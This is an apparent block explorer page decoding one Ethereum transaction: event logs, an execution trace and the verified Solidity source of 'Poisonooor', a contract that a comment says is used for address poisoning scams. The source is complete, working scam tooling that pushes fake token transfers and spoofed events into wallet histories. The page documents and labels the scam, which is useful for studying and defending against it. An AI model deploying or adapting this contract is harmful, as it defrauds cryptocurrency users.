ETH Price: $2,536.26 (+1.19%)

Transaction Decoder

Block:
22854029 at Jul-05-2025 03:52:11 PM +UTC
Transaction Fee:
0.000036245508754455 ETH $0.09
Gas Used:
68,709 Gas / 0.527521995 Gwei

Emitted Events:

368 0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000f8a11579259d3aea11e9f96216de0837303f5678, 0x000000000000000000000000d535264066e85bc311d072b8cbe862eab0022c24, 000000000000000000000000000000000000000000000000372a0970862d8000 )
369 Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000d535264066e85bc311d072b8cbe862eab0022c24, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 000000000000000000000000000000000000000000000000372a0970862d8000 )
370 0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x0000000000000000000000008c7c72653cc203f96aa2e9ad6383f5fa5840030a, 0x000000000000000000000000a476e899bb89501065748a10b034034d1b85cf1b, 000000000000000000000000000000000000000000000000016345785d8a0000 )
371 Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000a476e899bb89501065748a10b034034d1b85cf1b, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 000000000000000000000000000000000000000000000000016345785d8a0000 )
372 0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000d53547849e0e6fb46a872ad910afc16ebd5f2c24, 0x0000000000000000000000006a835c4c46b24f3b9483c469038702322f0696b6, 000000000000000000000000000000000000000000000000036c590edebee000 )
373 Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000006a835c4c46b24f3b9483c469038702322f0696b6, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 000000000000000000000000000000000000000000000000036c590edebee000 )
374 0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x00000000000000000000000096030802b33a610d6b9a54bc63084bd2a0c3087e, 0x0000000000000000000000009dc6904b2a8cdf4a8084136f2ff42eaf8da5373d, 00000000000000000000000000000000000000000000000014d0d906a2bcf5b8 )
375 Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000009dc6904b2a8cdf4a8084136f2ff42eaf8da5373d, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 00000000000000000000000000000000000000000000000014d0d906a2bcf5b8 )
376 0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x0000000000000000000000009dc65308ec7f0376ae510e5866dab3b484dc373d, 0x000000000000000000000000cd162a51d439a57cd876a5a0e35049bf63ef9cff, 00000000000000000000000000000000000000000000000006f05b59d3b20000 )
377 Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000cd162a51d439a57cd876a5a0e35049bf63ef9cff, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 00000000000000000000000000000000000000000000000006f05b59d3b20000 )
378 0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000bd1bb2774c5eae7f8651016c2a26db7a7dd39d35, 0x0000000000000000000000002f880d03ea84d9b49ad0266dbd1de47cb20e6961, 000000000000000000000000000000000000000000000000083019dfc17b0000 )
379 Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000002f880d03ea84d9b49ad0266dbd1de47cb20e6961, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 000000000000000000000000000000000000000000000000083019dfc17b0000 )

Account State Difference:

  Address   Before After State Difference Code
0x4AAE2F23...6F8466c82
(Fake_Phishing1250369)
0.276266752366509587 Eth
Nonce: 34202
0.276230506857755132 Eth
Nonce: 34203
0.000036245508754455
(BuilderNet)
29.342426671525872049 Eth29.342430106975872049 Eth0.00000343545

Execution Trace

Poisonooor.transfer( 0x0000000000000000000000000000000000000020, 32 ) => ( True )
  • Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0xF8A11579259D3Aea11E9F96216De0837303F5678, to=0xd535264066e85Bc311d072b8cBE862Eab0022C24, amount=3975000000000000000 )
    • Fake_Phishing1258380.23b872dd( )
    • Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0x8C7c72653cc203f96Aa2e9ad6383F5fA5840030a, to=0xa476E899bB89501065748a10b034034d1B85cF1B, amount=100000000000000000 )
      • Fake_Phishing1258380.23b872dd( )
      • Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0xD53547849E0e6Fb46a872ad910AfC16EbD5f2c24, to=0x6a835c4c46b24f3b9483c469038702322f0696b6, amount=246670000000000000 )
        • Fake_Phishing1258380.23b872dd( )
        • Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0x96030802b33A610d6B9a54bc63084bD2a0C3087E, to=0x9Dc6904B2a8CDf4A8084136f2fF42EAf8Da5373d, amount=1499937298437699000 )
          • Fake_Phishing1258380.23b872dd( )
          • Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0x9dC65308eC7F0376aE510e5866DAb3b484dC373d, to=0xCd162A51d439a57CD876A5A0e35049bF63ef9CFF, amount=500000000000000000 )
            • Fake_Phishing1258380.23b872dd( )
            • Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0xBD1bb2774C5EAE7F8651016c2a26Db7A7Dd39D35, to=0x2f880d03EA84D9B49Ad0266dbd1DE47Cb20E6961, amount=590000000000000000 )
              • Fake_Phishing1258380.23b872dd( )
                pragma solidity 0.8.26;
                
                interface IERC20 {
                    function transfer(address to, uint256 value) external returns (bool);
                    function transferFrom(address from, address to, uint256 value) external returns (bool);
                    function balanceOf(address account) external view returns (uint256);
                }
                
                contract Poisonooor {
                
                    /* 
                        This contract is used by bad guys for the address poisoning scam to trick inattentive users into sending USDT/USDC to the wrong addresses
                        Recreated and exposed by Wintermute
                
                        DESCRIPTION OF HOW THIS SCAM WORKS:
                        https://www.blockaid.io/blog/a-deep-dive-into-address-poisoning
                    */
                
                    using SafeERC20 for IERC20;
                
                    mapping(address => mapping(address => uint256)) public mapping_4850931766;
                
                    event Transferred(bytes32 indexed, address indexed, address indexed, uint256) anonymous;
                
                    receive() external payable {}
                
                    fallback() external payable {
                        require(msg.value == 0, "Ether not accepted");
                        transfer(address(0), 0);
                    }
                
                    function attemptTransfer(IERC20 token, address from, address to, uint256 amount) external {
                        token.safeTransferFrom(from, to, amount);
                    }
                
                    function transfer(address, uint256) public returns (bool) {
                        uint256 len = msg.data.length;
                        require((len - 68) % 128 == 0, "Invalid call data length");
                        uint256 iters = (len - 68) / 128;
                        for (uint256 i = 0; i < iters; i++) {
                            uint256 offset = 68 + i * 128;
                
                            address from;
                            address to;
                            address token;
                            uint256 amount;
                
                            assembly {
                                from := calldataload(offset)
                                to := calldataload(add(offset, 32))
                                token := calldataload(add(offset, 64))
                                amount := calldataload(add(offset, 96))
                            }
                
                           try this.attemptTransfer(IERC20(from), to, token, amount) {
                            emit Transferred(hex"c1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db", token, from, amount);
                           } catch {
                            mapping_4850931766[token][from] += amount;
                           }
                        }
                        return true;
                    }
                
                }
                
                library SafeERC20 {
                  error SafeERC20FailedOperation(address token);
                
                  function safeTransferFrom(IERC20 token, address from, address to, uint256 value) internal {
                    _callOptionalReturn(token, abi.encodeCall(token.transferFrom, (from, to, value)));
                  }
                
                  function _callOptionalReturn(IERC20 token, bytes memory data) private {
                    uint256 returnSize;
                    uint256 returnValue;
                    assembly ("memory-safe") {
                      let success := call(gas(), token, 0, add(data, 0x20), mload(data), 0, 0x20)
                      if iszero(success) {
                        let ptr := mload(0x40)
                        returndatacopy(ptr, 0, returndatasize())
                        revert(ptr, returndatasize())
                      }
                      returnSize := returndatasize()
                      returnValue := mload(0)
                    }
                    if (returnSize == 0 ? address(token).code.length == 0 :  returnValue != 1) {
                      revert SafeERC20FailedOperation(address(token));
                    }
                  }
                }